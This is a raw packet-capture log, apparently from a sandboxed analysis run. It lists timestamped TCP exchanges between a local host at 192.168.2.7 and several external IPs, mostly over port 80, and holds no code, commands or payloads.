Aug 26, 2024 23:29:22.102766991 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102777004 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102791071 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.102794886 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102807999 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102807999 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.102818012 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102830887 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.102837086 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.102868080 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.116770029 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:22.122457981 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:22.125129938 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125154972 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125166893 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125189066 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.125216961 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.125252962 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125263929 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125273943 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125291109 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.125297070 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.125322104 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.125425100 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.161453009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161533117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161542892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161567926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161578894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161629915 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.161662102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161669970 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.161679029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161689997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161700964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161708117 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.161747932 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.161931992 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161942959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161952972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161963940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161983013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.161984921 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.161998034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162009954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162019968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162024021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162030935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162041903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162044048 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162065029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162065029 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162070036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162075043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162080050 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162082911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162086964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162147999 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162214041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162225008 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162235022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162246943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162257910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162265062 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162270069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162272930 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162306070 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162312984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162322998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162333965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162344933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162353039 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162357092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.162380934 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.162409067 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179212093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179224014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179234982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179245949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179255009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179264069 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179266930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179284096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179294109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179303885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179315090 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179316044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179326057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179337025 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179337978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179351091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179352045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179373980 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179385900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179446936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179457903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179466963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179477930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179488897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179497957 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179524899 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179542065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179553986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179590940 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179662943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179707050 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179816008 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179867983 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.179960966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179970980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179980040 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.179992914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180007935 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180011034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180023909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180035114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180037022 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180044889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180056095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180057049 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180067062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180092096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180097103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180108070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180111885 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180136919 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180193901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180205107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180214882 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180223942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180234909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180243969 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180246115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180262089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180265903 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180274010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180289984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180319071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180347919 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180358887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180389881 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180407047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180418968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180428982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180452108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180454969 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180454969 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180463076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180463076 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180478096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180495024 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180502892 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180533886 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180588961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180598974 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180608988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180619001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180629015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180634022 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180639982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180666924 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180697918 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180778980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180790901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180802107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180810928 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180821896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180852890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180864096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180874109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180879116 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180886030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180897951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.180917978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.180948973 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181025982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181072950 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181121111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181132078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181143045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181154013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181164980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181169033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181175947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181190014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181202888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181222916 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181256056 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181891918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181904078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181914091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181947947 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181978941 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.181984901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.181997061 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.182007074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.182034016 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.182060003 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.182275057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.182286024 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:22.182322979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:22.183728933 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:22.186650991 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186670065 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186686993 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186700106 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186711073 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186721087 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186732054 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186744928 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186748981 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186754942 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186767101 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186778069 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186789036 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186830044 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186830044 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186841011 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186852932 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186861992 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186872959 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.186889887 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186925888 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.186925888 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.187448978 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187500954 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187514067 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187517881 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.187547922 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.187644005 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187654972 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187664986 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187679052 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187694073 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.187721014 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.187958002 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187968969 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187978983 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.187992096 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188013077 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188035011 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188220024 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188230991 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188241959 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188254118 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188266039 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188266039 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188283920 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188292980 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188294888 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188304901 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188313007 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188318968 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188328981 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188342094 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188343048 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188354015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188365936 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188374996 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188378096 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188389063 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188395023 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188409090 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188426971 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188437939 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188441992 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188447952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188467026 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188467979 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188478947 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188496113 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188496113 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188507080 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188519955 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188535929 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188536882 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188548088 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188560009 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188565016 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188572884 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188584089 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188585043 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188610077 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188630104 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188647032 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188663960 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188677073 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188688040 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188688993 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188700914 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188702106 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188715935 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188724995 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188733101 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188745022 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188751936 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188755035 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188766956 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188771963 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188780069 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188791990 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:22.188798904 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188802004 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188813925 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.188839912 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.188863993 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189618111 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189630032 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189641953 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189654112 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189661980 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189677000 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189697981 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189809084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189825058 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189836025 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189848900 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189860106 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189861059 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189871073 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189882040 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189892054 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189898968 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189903021 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189913988 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189914942 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189925909 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189933062 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189937115 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189954996 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189964056 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:22.189965963 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:22.189976931 CEST	80	49733	185.215.113.17	192.168.2.7
